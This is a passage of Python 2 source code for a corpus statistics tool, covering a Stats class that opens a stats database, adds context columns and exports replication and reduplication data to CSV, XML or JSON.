def open(self, path_to_stats_db, encryption_key=False):
if self.statsdb:
self.logger.error("StatsInitError: An active Stats Instance was found. Please close already initialized/opened Stats, before new initialization.", exc_info=self._logger_traceback)
return False
self.statsdb = DBHandler( **self._init_attributesfor_dbhandler())
self.statsdb.connect(path_to_stats_db, encryption_key=encryption_key)
if self.statsdb.exist():
if self.statsdb.typ() != "stats":
self.logger.error("Current DB is not an StatsDB.")
self._close()
return False
self.logger.debug("StatsOpener: '{}'-Stats was successful opened.".format(os.path.basename(path_to_stats_db)))
self.set_all_intern_attributes_from_db()
self.logger.settings("OpenedStatsDBAttributes: {}".format( instance_info(self.statsdb.get_all_attr(), attr_to_len=False, attr_to_flag=False, as_str=True)))
self._init_column_index_variables()
self.baseline_ngramm_lenght = 1 +self._context_lenght
self._init_stemmer(self._language)
return True
else:
self.logger.error("StatsOpener: Unfortunately '{}'-Stats wasn't opened.".format(os.path.basename(path_to_stats_db)), exc_info=self._logger_traceback)
return False
def set_all_intern_attributes_from_db(self):
#{u'name': u'bloggerCorpus', u'created_at': u'2018-07-26 17:49:11', u'visibility': u'extern', u'version': u'1', u'corpus_id': 7614, u'typ': u'stats', u'id': 3497}
info_dict = self.info()
self._name = info_dict["name"]
self._created_at = info_dict["created_at"]
self._visibility = info_dict["visibility"]
self._version = info_dict["version"]
self._corpus_id = info_dict["corpus_id"]
self._typ = info_dict["typ"]
self._id = info_dict["id"]
self._db_frozen = info_dict["db_frozen"]
self._context_lenght = info_dict["context_lenght"]
self._language = info_dict["language"]
#self._context_lenght = info_dict["context_right"]
self._avaliable_scope = self._context_lenght+1
self._repl_up = info_dict["repl_up"]
#self._log_ignored = info_dict["log_ignored"]
self._ignore_hashtag = info_dict["ignore_hashtag"]
self._ignore_url = info_dict["ignore_url"]
self._ignore_mention = info_dict["ignore_mention"]
self._ignore_punkt = info_dict["ignore_punkt"]
self._ignore_num = info_dict["ignore_num"]
self._force_cleaning = info_dict["force_cleaning"]
self._case_sensitiv = info_dict["case_sensitiv"]
self._full_repetativ_syntagma = info_dict["full_repetativ_syntagma"]
# self._text_field_name = info_dict["text_field_name"]
# self._id_field_name = info_dict["id_field_name"]
self._min_scope_for_indexes = info_dict["min_scope_for_indexes"]
self._pos_tagger = info_dict["pos_tagger"]
self._sentiment_analyzer = info_dict["sentiment_analyzer"]
self._baseline_delimiter = info_dict["baseline_delimiter"]
#self._id_field_name = None
#self._text_field_name = None
def _get_col_index(self, col_name, table_name):
try:
return self.statsdb.col(table_name).index(col_name)
except ValueError, e:
self.logger.error("'{}'-Colum is not in the '{}'-Table.".fromat(col_name, table_name))
return False
def _init_attributesfor_dbhandler(self):
init_attributes_db_handler = {
"stop_if_db_already_exist":self._stop_if_db_already_exist,
"rewrite":self._rewrite,
"logger_level":self._logger_level,
"optimizer":self._optimizer,
"in_memory":self._in_memory,
"logger_traceback":self._logger_traceback,
"logger_folder_to_save":self._logger_folder_to_save,
"logger_usage":self._logger_usage,
"logger_save_logs":self._logger_save_logs,
"thread_safe":self._thread_safe,
"mode":self._mode,
"error_tracking":self._error_tracking,
"ext_tb":self._ext_tb,
"isolation_level":self._isolation_level,
"optimizer_page_size":self._optimizer_page_size,
"optimizer_cache_size":self._optimizer_cache_size,
"optimizer_locking_mode":self._optimizer_locking_mode,
"optimizer_synchronous":self._optimizer_synchronous,
"optimizer_journal_mode":self._optimizer_journal_mode,
"optimizer_temp_store":self._optimizer_temp_store,
"use_cash":self._use_cash,
"replace_double_items":True,
"stop_process_if_possible":self._stop_process_if_possible,
"make_backup": self._make_backup,
"lazyness_border": self._lazyness_border,
"save_settings": self._save_settings,
"save_status": self._save_status,
"log_content": self._log_content,
"clear_logger": self._clear_logger,
#_replace_double_items
}
return init_attributes_db_handler
def _init_stemmer(self, language):
if language not in Corpus.stemmer_for_languages:
self.logger.error("StemmerINIT: is failed. '{}'-language is not supported.")
return False
lan = from_ISO639_2[language]
self.stemmer = Stemmer.Stemmer(lan)
return True
def stemm(self, word):
#p(word, "word")
try:
word.decode
return self.stemmer.stemWord(word)
except:
return self.stemmer.stemWord(word[0])
def add_context_columns(self, context_lenght):
self._add_context_columns("replications", context_lenght)
self._add_context_columns("reduplications", context_lenght)
def _add_context_columns(self, table_name, context_lenght):
#p("ghjkl")
exist_columns = self.statsdb.col(table_name)
#p(exist_columns,"exist_columns", c="r")
## context left
for context_number in reversed(range(1,context_lenght+1)):
### WordCell####
name = "contextL{}".format(context_number)
exist_columns = self.statsdb.col(table_name)
if name not in exist_columns:
if self.statsdb.add_col(table_name, name, "JSON"):
self.logger.debug("'{}'-Columns was inserted into '{}'-Table. ".format(name, table_name))
else:
return False
else:
self.logger.error("'{}'-Column is already exist in the '{}'-Table. ColumnInsertion was aborted. ".format(name, table_name))
#yield False
return False
### Additional Info Col ####
name = "context_infoL{}".format(context_number)
exist_columns = self.statsdb.col(table_name)
if name not in exist_columns:
if self.statsdb.add_col(table_name, name, "JSON"):
self.logger.debug("'{}'-Columns was inserted into '{}'-Table. ".format(name, table_name))
else:
return False
else:
self.logger.error("'{}'-Column is already exist in the '{}'-Table. ColumnInsertion was aborted. ".format(name, table_name))
#yield False
return False
# context right
for context_number in range(1,context_lenght+1):
### WordCell####
name = "contextR{}".format(context_number)
if name not in exist_columns:
self.statsdb.add_col(table_name, name, "JSON")
self.logger.debug("'{}'-Columns was inserted into '{}'-Table. ".format(name, table_name))
#yield True
else:
self.logger.error("'{}'-Column is already exist in the '{}'-Table. ColumnInsertion was aborted. ".format(name, table_name))
return False
#return
### Additional Info Col ####
name = "context_infoR{}".format(context_number)
if name not in exist_columns:
self.statsdb.add_col(table_name, name, "JSON")
self.logger.debug("'{}'-Columns was inserted into '{}'-Table. ".format(name, table_name))
#yield True
else:
self.logger.error("'{}'-Column is already exist in the '{}'-Table. ColumnInsertion was aborted. ".format(name, table_name))
return False
#return
exist_columns = self.statsdb.col(table_name)
#p(exist_columns,"exist_columns", c="r")
return True
#sys.exit()
def info(self):
if not self._check_stats_db_should_exist():
return False
if not self._check_db_should_be_an_stats():
return False
return self.statsdb.get_all_attr()
# def get_streams_from_corpus(self,inp_corp,stream_number,datatyp="dict"):
# row_num = inp_corp.corpdb.rownum("documents")
# rows_pro_stream = row_num/stream_number
# streams = []
# num_of_getted_items = 0
# for i in range(stream_number):
# thread_name = "Thread{}".format(i)
# if i < (stream_number-1): # for gens in between
# gen = inp_corp.corpdb.lazyget("documents",limit=rows_pro_stream, offset=num_of_getted_items,thread_name=thread_name, output=datatyp)
# num_of_getted_items += rows_pro_stream
# streams.append((thread_name,LenGen(gen, rows_pro_stream)))
# else: # for the last generator
# gen = inp_corp.corpdb.lazyget("documents",limit=-1, offset=num_of_getted_items,thread_name=thread_name, output=datatyp)
# streams.append((thread_name,LenGen(gen, row_num-num_of_getted_items)))
# return streams
#def
def get_streams_from_corpus(self,inp_corp,stream_number,datatyp="dict", size_to_fetch=1000):
row_num = inp_corp.corpdb.rownum("documents")
rows_pro_stream = row_num/stream_number
streams = []
num_of_getted_items = 0
#p((self._id_field_name, self._text_field_name))
def intern_gen(limit, offset):
#p((limit, offset))
query = u'SELECT {}, {} FROM main.documents LIMIT {} OFFSET {};'.format(self._id_field_name, self._text_field_name,limit, offset)
cur = inp_corp.corpdb._threads_cursors[thread_name].execute(query)
while True:
res = list(cur.fetchmany(size_to_fetch))
if not res:
break
for row in res:
#yield {self._id_field_name:row[0], self._text_field_name:row[1]}
yield row
# def intern_sender(pipe, gen, length, chunk_size= 10000):
# #result = pipe.recv()
# #sended_num = 0
# #was_close = False
# while True:
# command = pipe.recv()
# if command == "+":
# i = 0
# while i <= chunk_size:
# try:
# g = next(gen)
# except StopIteration:
# pipe.send(None)
# break
# #p(g, "SENDER", c="r")
# #pipe.send(next(gen))
# pipe.send(g)
# i += 1
# #sended_num += i
# pipe.send(False)
# else:
# #was_close = True
# #pipe.close()
# break
# pipe.send(None)
# pipe.send(None)
#p(num_of_getted_items,"num_of_getted_items")
for i in range(stream_number):
thread_name = "Thread{}".format(i)
parent, child = Pipe()
if i < (stream_number-1): # for gens in between
#gen = inp_corp.corpdb.lazyget("documents",limit=rows_pro_stream, offset=num_of_getted_items,thread_name=thread_name, output=datatyp)
#gen = inp_corp.corpdb.lazyget("documents",limit=rows_pro_stream, offset=num_of_getted_items,thread_name=thread_name, output=datatyp)
#p((rows_pro_stream, num_of_getted_items))
#sender = intern_sender(parent, intern_gen(rows_pro_stream, num_of_getted_items), rows_pro_stream, chunk_size= 10000)
# = LenGen(intern_gen(rows_pro_stream, num_of_getted_items), rows_pro_stream)
sender = Process(target=intern_sender, args=(parent, intern_gen(rows_pro_stream, num_of_getted_items), rows_pro_stream, 10000))
sender.start()
streams.append((thread_name,rows_pro_stream,child,sender))
num_of_getted_items += rows_pro_stream
#print num_of_getted_items, rows_pro_stream
else: # for the last generator
#gen = inp_corp.corpdb.lazyget("documents",limit=-1, offset=num_of_getted_items,thread_name=thread_name, output=datatyp)
#p((-1, num_of_getted_items))
sender = Process(target=intern_sender, args=(parent, intern_gen(-1, num_of_getted_items), row_num-num_of_getted_items, 10000))
sender.start()
#streams.append((thread_name,LenGen(intern_gen(-1, num_of_getted_items), row_num-num_of_getted_items)))
streams.append((thread_name,row_num-num_of_getted_items,child,sender))
num_of_getted_items += rows_pro_stream
return streams
# query = u'SELECT {}, {} FROM main.documents LIMIT {} OFFSET {};'.format(self._id_field_name, self._text_field_name,rows_pro_stream, num_of_getted_items)
# while True:
# #p(cursor, "cursor")
# results = cursor["out_obj"].fetchmany(size_to_fetch)
# #p(results, "results")
# results = list(results)
# #p(results, "results")
# if not results:
# break
# for row in results:
# #p(row,"row")
# yield row
def _get_export_phanomena(self,repl=False, redu=False, baseline=False):
to_export = []
if repl:
to_export.append("repl")
if redu:
to_export.append("redu")
if baseline:
to_export.append("baseline")
return to_export
def _get_exporter_flags(self,repl=False, redu=False, baseline=False):
flags = []
if redu:
flags.append(True)
if repl:
flags.append(True)
if baseline:
flags.append(True)
return flags
# def _get_header(self, flags, repl=False, redu=False, baseline=False, output_table_type="exhausted", embedded_baseline=True, max_scope=False, additional_doc_cols=False):
# header_main = []
# header_additional = []
# baseline_col_names = Stats.output_tables_col_names["baseline"]
# extracted_colnames_for_repl = [item[0] for item in db_helper.default_tables["stats"]["replications"]]
# extracted_colnames_for_redu = [item[0] for item in db_helper.default_tables["stats"]["reduplications"]]
# baseline_col_names_repl = [baseline_col_names["all"],baseline_col_names["repl"]["uniq"],baseline_col_names["repl"]["exhausted"]]
# baseline_col_names_redu = [baseline_col_names["all"],baseline_col_names["redu"]["uniq"],baseline_col_names["redu"]["exhausted"]]
# #db_helper.get
# if max_scope and max_scope >1:
# header_main.append("syntagma")
# header_additional.append("syntagma")
# if len(flags) == 1:
# if repl:
# header_main = [item[0] for item in db_helper.default_tables["stats"]["replications"]]
# elif redu:
# header_main = [item[0] for item in db_helper.default_tables["stats"]["reduplications"]]
# elif baseline:
# header_main = [item[0] for item in db_helper.default_tables["stats"]["baseline"]]
# elif len(flags) == 2:
# if output_table_type == "sum":
# pass
# else:
# if repl and baseline:
# if embedded_baseline:
# #header_main.append(db_helper.tag_normalized_word)
# #extracted_colnames_for_repl.remove(db_helper.tag_normalized_word)
# extracted_colnames_for_repl.remove(db_helper.tag_normalized_word)
# header_main.append(db_helper.tag_normalized_word)
# header_main += baseline_col_names_repl
# header_main += extracted_colnames_for_repl
# else:
# header_main += extracted_colnames_for_repl
# baseline_col_names_repl.insert(0,db_helper.tag_normalized_word)
# header_additional += baseline_col_names_repl
# elif redu and baseline:
# if embedded_baseline:
# #header_main.append(db_helper.tag_normalized_word)
# extracted_colnames_for_redu.remove(db_helper.tag_normalized_word)
# header_main.append(db_helper.tag_normalized_word)
# header_main += baseline_col_names_redu
# header_main += extracted_colnames_for_redu
# else:
# header_main += extracted_colnames_for_redu
# baseline_col_names_redu.insert(0,db_helper.tag_normalized_word)
# header_additional += baseline_col_names_redu
# elif redu and repl:
# extracted_colnames_for_repl.remove(db_helper.tag_normalized_word)
# extracted_colnames_for_redu.remove(db_helper.tag_normalized_word)
# #header_main.append(db_helper.tag_normalized_word)
# header_main.append(db_helper.tag_normalized_word)
# #if embedded_baseline:
# #header_main.append(db_helper.tag_normalized_word)
# uniq_for_redu = [item for item in extracted_colnames_for_redu if item not in extracted_colnames_for_repl]
# header_main += extracted_colnames_for_repl+uniq_for_redu
# elif len(flags) == 3:
# if embedded_baseline:
# extracted_colnames_for_repl.remove(db_helper.tag_normalized_word)
# extracted_colnames_for_redu.remove(db_helper.tag_normalized_word)
# header_main.append(db_helper.tag_normalized_word)
# header_additional.append(db_helper.tag_normalized_word)
# header_additional += baseline_col_names_repl
# baseline_col_names_redu.remove(baseline_col_names["all"])
# header_additional += baseline_col_names_redu
# header_main += extracted_colnames_for_repl
# uniq_for_redu = [item for item in extracted_colnames_for_redu if item not in extracted_colnames_for_repl]
# header_main += uniq_for_redu
# else:
# extracted_colnames_for_repl.remove(db_helper.tag_normalized_word)
# extracted_colnames_for_redu.remove(db_helper.tag_normalized_word)
# header_main.append(db_helper.tag_normalized_word)
# header_main += baseline_col_names_repl
# baseline_col_names_redu.remove(baseline_col_names["all"])
# header_main += baseline_col_names_redu
# header_main += extracted_colnames_for_repl
# uniq_for_redu = [item for item in extracted_colnames_for_redu if item not in extracted_colnames_for_repl]
# header_main += uniq_for_redu
# #self.logger.error("Simultan Export for 3 Phenomena at the same time is not implemented.")
# if len(header_additional)==1:
# header_additional = []
# if header_main and header_additional:
# return header_main, header_additional
# elif header_main:
# return header_main
def _add_context_columns(self, table_name, context_lenght):
#p("ghjkl")
exist_columns = self.statsdb.col(table_name)
#p(exist_columns,"exist_columns", c="r")
## context left
for context_number in reversed(range(1,context_lenght+1)):
### WordCell####
name = "contextL{}".format(context_number)
exist_columns = self.statsdb.col(table_name)
if name not in exist_columns:
if self.statsdb.add_col(table_name, name, "JSON"):
self.logger.debug("'{}'-Columns was inserted into '{}'-Table. ".format(name, table_name))
else:
return False
else:
self.logger.error("'{}'-Column is already exist in the '{}'-Table. ColumnInsertion was aborted. ".format(name, table_name))
#yield False
return False
### Additional Info Col ####
name = "context_infoL{}".format(context_number)
exist_columns = self.statsdb.col(table_name)
if name not in exist_columns:
if self.statsdb.add_col(table_name, name, "JSON"):
self.logger.debug("'{}'-Columns was inserted into '{}'-Table. ".format(name, table_name))
else:
return False
else:
self.logger.error("'{}'-Column is already exist in the '{}'-Table. ColumnInsertion was aborted. ".format(name, table_name))
#yield False
return False
# context right
for context_number in range(1,context_lenght+1):
### WordCell####
name = "contextR{}".format(context_number)
if name not in exist_columns:
self.statsdb.add_col(table_name, name, "JSON")
self.logger.debug("'{}'-Columns was inserted into '{}'-Table. ".format(name, table_name))
#yield True
else:
self.logger.error("'{}'-Column is already exist in the '{}'-Table. ColumnInsertion was aborted. ".format(name, table_name))
return False
#return
### Additional Info Col ####
name = "context_infoR{}".format(context_number)
if name not in exist_columns:
self.statsdb.add_col(table_name, name, "JSON")
self.logger.debug("'{}'-Columns was inserted into '{}'-Table. ".format(name, table_name))
#yield True
else:
self.logger.error("'{}'-Column is already exist in the '{}'-Table. ColumnInsertion was aborted. ".format(name, table_name))
return False
#return
exist_columns = self.statsdb.col(table_name)
#p(exist_columns,"exist_columns", c="r")
return True
#sys.exit()
def attached_corpdb_number(self):
if not self._check_stats_db_should_exist():
return False
return len(self.statsdb.dbnames)-1
def attach_corpdb(self, path_to_corpdb, encryption_key=False):
if not self._check_stats_db_should_exist():
return False
#p(path_to_corpdb, "path_to_corpdb")
if not self.statsdb.attach(path_to_corpdb, encryption_key=encryption_key, db_name=self.corpdb_defaultname)["status"]:
self.logger.error("'{}' wasn't attached.".format(path_to_corpdb))
return False
id_from_attached_corp = self.statsdb.get_attr("id",dbname=self.corpdb_defaultname)
corp_id = self.statsdb.get_attr("corpus_id",dbname="main")
#p(())
if id_from_attached_corp != corp_id:
self.logger.error("Attached CorpDB (id='{}') is not suitable with the current StatsDB. Current StatsDB is suitable with CorpDB with id='{}'.".format(id_from_attached_corp, corp_id))
self.statsdb.detach(dbname=self.corpdb_defaultname)
return False
self.attached_corpdb_name = self.corpdb_defaultname
return True
def _get_context_cols(self, direction, context_lenght):
output = ()
if direction == "left":
for context_number in reversed(range(1,context_lenght+1)):
### WordCell####
output += ("contextL{}".format(context_number),)
### Additional Info Col ####
output += ("context_infoL{}".format(context_number),)
else:
# context right
for context_number in range(1,context_lenght+1):
### WordCell####
output += ("contextR{}".format(context_number),)
### Additional Info Col ####
output += ("context_infoR{}".format(context_number),)
return output
def _get_header(self, repl=False, redu=False, baseline=False, output_table_type="exhausted", max_scope=False, additional_doc_cols=False, context_len_left=True, context_len_right=True,word_examples_sum_table=True):
if not self._check_stats_db_should_exist():
return False
if output_table_type == "exhausted":
return self._get_header_exhausted( repl=repl, redu=redu, baseline=baseline, additional_doc_cols=additional_doc_cols, context_len_left=context_len_left, context_len_right=context_len_right)
else:
return self._get_header_sum(repl=repl, redu=redu,word_examples_sum_table=word_examples_sum_table)
def _get_header_sum(self, repl=False, redu=False, word_examples_sum_table=True):
if repl and redu:
self.logger.error("GetSummeryHeaderError: Repl and Redu was selected in the same time. Summery Header could be created just for one Phenomen each time.")
return False
output = False
col_repls_core = ("letter", "NrOfRepl", "Occur")
col_redus_core = ("word", "ReduLength", "Occur")
if repl:
col_repls_core = col_repls_core+("Examples",) if word_examples_sum_table else col_repls_core
output = col_repls_core
if redu:
#col_redus_core = col_redus_core+("Examples",) if word_examples_sum_table else col_redus_core
output = col_redus_core
return output
def _get_header_exhausted(self, repl=False, redu=False, baseline=False, additional_doc_cols=False, context_len_left=True, context_len_right=True):
if (repl and not baseline) or (redu and not baseline):
self.logger.error("Export is possible just with selected baseline. Please select also baseline to start the export process.")
return False
if baseline:
baseline = ()
baseline += db_helper.default_col_baseline_main
baseline += db_helper.default_col_baseline_repls_core if repl else ()
baseline += db_helper.default_col_baseline_redus_core if redu else ()
baseline += db_helper.default_col_baseline_repls_addit if repl else ()
baseline += db_helper.default_col_baseline_redus_addit if redu else ()
baseline = tuple(item[0] for item in baseline)
if repl:
repl = ()
repl += db_helper.default_col_for_rep_core
repl += db_helper.default_col_for_rep_indexes
repl += db_helper.default_col_for_rep_repl_data
repl = tuple(item[0] for item in repl)
if redu:
redu = ()
redu += db_helper.default_col_for_rep_core
redu += db_helper.default_col_for_rep_indexes
redu += db_helper.default_col_for_rep_redu_data
redu = tuple(item[0] for item in redu)
word = ()
if repl and not redu:
word += db_helper.default_col_for_repl_word_info
word += db_helper.default_col_for_rep_addit_info_word
elif not repl and redu:
word += db_helper.default_col_for_redu_word_info
word += db_helper.default_col_for_rep_addit_info_word
elif repl and redu:
word += db_helper.default_col_for_repl_word_info
word += db_helper.default_col_for_rep_addit_info_word
word = tuple(item[0] for item in word) if word else ()
document = ()
context = ()
if repl or redu:
document += (tuple(item[0] for item in db_helper.default_col_for_rep_doc_info) ,)
if additional_doc_cols:
document += (tuple(additional_doc_cols),)
else:
document += (None,)
## context left
#context += ()
avalible_context_num_in_stats = self.statsdb.get_attr("context_lenght")
if context_len_left:
context_len_left = avalible_context_num_in_stats if context_len_left is True else context_len_left
if context_len_left > avalible_context_num_in_stats:
self.logger.error("Given ContextLeft Number is higher as possible. Current StatsDB was computed for '{}'-context number. Please use one number, which are not higher as computed context number for current StatsDB.".format(context_len_left,avalible_context_num_in_stats))
return False
context += self._get_context_cols("left", context_len_left)
if context_len_right:
context_len_right = avalible_context_num_in_stats if context_len_right is True else context_len_right
if context_len_right > avalible_context_num_in_stats:
self.logger.error("Given ContextRight Number is higher as possible. Current StatsDB was computed for '{}'-context number. Please use one number, which are not higher as computed context number for current StatsDB.".format(context_len_right,avalible_context_num_in_stats))
return False
context += self._get_context_cols("right", context_len_right)
if not repl and not redu and not baseline:
return {}
else:
return {"baseline":baseline, "document":document, "word":word, "repl":repl, "redu":redu, "context":context}
def cols_exists_in_corpb(self, cols_to_check):
if not self._check_stats_db_should_exist():
return False
if not self.attached_corpdb_name:
self.logger.error("'{}' wasn't attached.".format(path_to_corpdb))
return False
cols_in_doc_tables_in_attached_corp = self.statsdb.col("documents", dbname=self.attached_corpdb_name)
for col in cols_to_check:
if col not in cols_in_doc_tables_in_attached_corp:
self.logger.error("'{}'-ColumnName wasn't found in CorpDB. Please use one of the following additional ColNames: '{}'.".format(col, cols_in_doc_tables_in_attached_corp))
return False
return True
def order_header(self,header, additional_doc_cols,export_file_type):
#p(header, "header")
if export_file_type == "csv":
wrapped_tag_pattern = "[{}]."
else:
wrapped_tag_pattern = "{}."
ordered_header = []
for table_part in Stats.header_order_to_export:
if table_part == "document":
#p(header[table_part], "header[table_part]")
try:
temp_list = list(header[table_part][0])
except:
temp_list = []
wrapped_tag = wrapped_tag_pattern.format(table_part)
ordered_header += ["{}{}".format(wrapped_tag,col) for col in temp_list ]
if additional_doc_cols:
if header[table_part][1]:
temp_list = list(header[table_part][1])
wrapped_tag = wrapped_tag_pattern.format(table_part)
ordered_header += ["{}{}".format(wrapped_tag,col) for col in temp_list ]
#p(ordered_header, "ordered_header")
else:
if header[table_part]:
for col in header[table_part]:
#p(col, "col " )
wrapped_tag = wrapped_tag_pattern.format(table_part)
ordered_header.append("{}{}".format(wrapped_tag,col))
return ordered_header
#Stats._non_pos_tags = set(["EMOIMG", "EMOASC", "number", "symbol", "hashtag", "mention","regular"])
def export(self,path_to_export_dir, syntagma="*", repl=False, redu=False,
baseline=True, syntagma_type="lexem", sentiment=False,
fname=False, export_file_type="csv", rows_limit_in_file=1000000,
encryption_key_corp=False, output_table_type="exhausted",
additional_doc_cols=False, encryption_key_for_exported_db=False,
path_to_corpdb=False, max_scope=False, stemmed_search=False,rewrite=False,
context_len_left=True, context_len_right=True, separator_syn=" || ",
word_examples_sum_table=True,ignore_num=False,ignore_symbol=False,):
#p(locals())
#p((path_to_export_dir,syntagma,repl,redu,syntagma_type,max_scope))
export_file_type = export_file_type.lower()
fname =fname if fname else "export_{}".format(time.time())
if self.statsdb.get_attr("locked"):
self.logger.error("Current DB is still be locked. Possibly it is right now in-use from other process or the last computation-process is failed.")
return False
if export_file_type not in Exporter.supported_file_formats:
self.logger.error("ExportError: '{}'-FileType is not supported. Please use one of the following file type: '{}'.".format(export_file_type, Exporter.supported_file_formats))
return False
if output_table_type not in Stats.output_tables_types:
self.logger.error("Given Type for the outputTable ('{}') is not supported. Please select one of the following types: '{}'. ".format(output_table_type, Stats.output_tables_types))
return False
if sentiment:
if not self._sentiment_analyzer:
self.logger.error("GetterError: Sentiment wasn't computed for current CorpusDB thats why it is not possible to export Data with sentiment.")
return False
if syntagma_type == "pos":
if not self._pos_tagger:
if syntagma != "*":
try:
syntagma[0].decode
for word in syntagma:
if word not in Stats._non_pos_tags:
self.logger.error(u"POSGetterError: Additional POS-Tag was found in Syntagma. ('{}') Current CorpusDB contain just default meta tags. ('{}') If you want to search in additional POS, than recompute CorpusDB with POS-Tagger.".format(word,Stats._non_pos_tags))
return False
except:
try:
syntagma[0][0].decode
for syn in syntagma:
for word in syn:
if word not in Stats._non_pos_tags:
self.logger.error(u"POSGetterError: Additional POS-Tag was found in Syntagma. ('{}') Current CorpusDB contain just default meta tags. ('{}') If you want to search in additional POS, than recompute CorpusDB with POS-Tagger.".format(word,Stats._non_pos_tags))
return False
except:
self.logger.error("SyntagmaError: Given Syntagma has incorrect structure.")
return False
#if repl and redu and baseline:
# self.logger.critical("It is not possible to get repls and redus parallel. Please select one option at the same moment.")
# return False
flags = self._get_exporter_flags(repl=repl, redu=redu, baseline=baseline)
if len(flags) == 0:
self.logger.error("No One Phenomena to Export was selected")
return False
if path_to_corpdb:
if not self.attach_corpdb(path_to_corpdb):
self.logger.debug("Given CorpDB '{}' either not exist or not suitable with the current StatsDB.".format(path_to_corpdb))
return False
if not path_to_corpdb and additional_doc_cols:
self.logger.error("Additional Columns from CorpusDB was given, but the path to CorpDB wasn't given. Please give also the path to CorpDB.")
return False
if additional_doc_cols:
if not self.cols_exists_in_corpb(additional_doc_cols):
return False
if output_table_type == "sum":
reptype_sum_table = "repl" if repl else "redu"
else:
reptype_sum_table = False
# p(locals())
#p(max_scope, "max_scope")
header = self._get_header( repl=repl, redu=redu, baseline=True, output_table_type=output_table_type, max_scope=max_scope, additional_doc_cols=additional_doc_cols, context_len_left=context_len_left, context_len_right=context_len_right,word_examples_sum_table=word_examples_sum_table)
if not header:
return False
rows_generator = self._export_generator(header,inp_syntagma=syntagma, reptype_sum_table=reptype_sum_table,
syntagma_type=syntagma_type, sentiment=sentiment, separator_syn=separator_syn,
output_table_type=output_table_type,max_scope=max_scope,
ignore_num=ignore_num,ignore_symbol=ignore_symbol,
word_examples_sum_table=word_examples_sum_table,stemmed_search=stemmed_search)
if not rows_generator:
self.logger.error("RowGenerator is failed.")
return False
if output_table_type == "sum":
ordered_header = header
else:
ordered_header = self.order_header(header, additional_doc_cols,export_file_type)
#p(ordered_header, "ordered_header")
def intern_gen():
# p("111")
for row in rows_generator:
# p("222")
if row:
yield {k:v for k,v in zip(ordered_header,row)}
exporter = Exporter(intern_gen(),rewrite=rewrite,silent_ignore=False )
if export_file_type == "csv":
exporter.tocsv(path_to_export_dir, fname, ordered_header, rows_limit_in_file=rows_limit_in_file)
elif export_file_type == "xml":
exporter.toxml(path_to_export_dir, fname, rows_limit_in_file=rows_limit_in_file, root_elem_name="export", row_elem_name="line")
#elif export_file_type == "sqlite":
# exporter.tosqlite(path_to_export_dir, fname, ordered_header, encryption_key=encryption_key_for_exported_db, table_name="Export")
elif export_file_type == "json":
exporter.tojson(path_to_export_dir, fname, rows_limit_in_file=rows_limit_in_file,)
else:
self.logger.error("'{}'-FileType is not supported..".format(export_file_type))
return False
def _get_values_from_doc(self, doc_id, cols_to_get):
if not self.attached_corpdb_name:
self.logger.error("No One CorpDB was attached. To get additional Columns from corpus, you need attach the right CorpDB before.")
return False
#p((doc_id, cols_to_get), c="m")
#p(self.statsdb.getall("documents", columns=cols_to_get, dbname=self.attached_corpdb_name, where="{}={}".format(self._doc_id_tag, doc_id)), c="r")
return self.statsdb.getone("documents", columns=cols_to_get, dbname=self.attached_corpdb_name, where="{}={}".format(self._doc_id_tag, doc_id))
def _export_generator(self,header,inp_syntagma="*", syntagma_type="lexem", sentiment=False,
output_table_type="exhausted", reptype_sum_table=False, separator_syn=" || ",
thread_name="Thread0",ignore_num=False,ignore_symbol=False,
word_examples_sum_table=True,max_scope=False,stemmed_search=False):
if not separator_syn:
self.logger.error("No Separator for Syntagma was selected.")
yield False
return
# p((inp_syntagma, max_scope),c="r")
#p(locals())
def redu_constr(single_redu):
temp_row = []
for table_part in Stats.header_order_to_export:
if table_part == "baseline":
temp_row += current_ordered_baseline_row
#p(temp_row, "temp_row")
elif table_part == "document":
#p(header["document"])
temp_row += [single_redu[ix_redu[col_name]] for col_name in header["document"][0]]
doc_id = single_redu[ix_doc_id_redu]
col_from_corp = header["document"][1]
#p(col_from_corp, "col_from_corp", c="g")
if col_from_corp:
values_from_corp = self._get_values_from_doc(doc_id, col_from_corp)
#p(values_from_corp, "values_from_corp")
if values_from_corp:
temp_row += list(values_from_corp)
else:
self.logger.error("No values from Corpus was returned")
yield False
return
elif table_part == "word":
temp_row += [None if col_name == 'rle_word' else single_redu[ix_redu[col_name]] for col_name in header["word"]]
elif table_part == "repl":
temp_row += [None for col_name in header["repl"]]
elif table_part == "redu":
temp_row += [single_redu[ix_redu[col_name]] for col_name in header["redu"]]
#extracted_redus.append(single_redu[ix_redu_id])
elif table_part == "context":
temp_row += [single_redu[ix_redu[col_name]] for col_name in header["context"]]
#exported_rows_count += 1
#p(temp_row, "2121temp_row",c="m")
#exported_rows_count += 1
yield temp_row
return
# p("!99999")
if output_table_type == "sum":
if reptype_sum_table not in ("repl", "redu"):
self.logger.error("Wrong RepType ('{}') was selected.".format(reptype_sum_table))
yield False
return
if self._status_bar:
try:
if not self.status_bars_manager.enabled:
self.status_bars_manager = self._get_status_bars_manager()
except:
self.status_bars_manager = self._get_status_bars_manager()
status_bar_start = self._get_new_status_bar(None, self.status_bars_manager.term.center("Exporter (sum)") , "", counter_format=self.status_bars_manager.term.bold_white_on_green("{fill}{desc}{fill}"))
status_bar_start.refresh()
data = self.compute_rep_sum(inp_syntagma, reptype_sum_table, syntagma_type=syntagma_type, sentiment=sentiment,
stemmed_search=stemmed_search, thread_name=thread_name, ignore_num=ignore_num,
ignore_symbol=ignore_symbol, word_examples_sum_table=word_examples_sum_table)
#p(data, "data")
exported_rows_count = 0
if reptype_sum_table == "redu":
tag = "Words"
if self._status_bar:
status_bar_current = self._get_new_status_bar(len(data), "Exporting:", "word")
for word, word_data in dict(sorted(data.items())).items():
if self._status_bar:
status_bar_current.update(incr=1)
for redu_length, occur in dict(sorted(word_data.items())).items():
exported_rows_count += 1
yield (word, redu_length,occur)
#pass
else:
tag = "Letters"
if self._status_bar:
status_bar_current = self._get_new_status_bar(len(data), "Exporting:", "letter")
for letter, letter_data in dict(sorted(data.items())).items():
if self._status_bar:
status_bar_current.update(incr=1)
for NrOfRepl, repl_data in dict(sorted(letter_data.items())).items():
exported_rows_count += 1
occur = repl_data[0]
temp_row = (letter, NrOfRepl, occur)
if word_examples_sum_table:
examples = dict(repl_data[1])
temp_row += (examples, )
yield temp_row
if self._status_bar:
#i += 1
#print status_bar_current.total, i
#if status_bar_current.total != i:
# status_bar_current.total = i
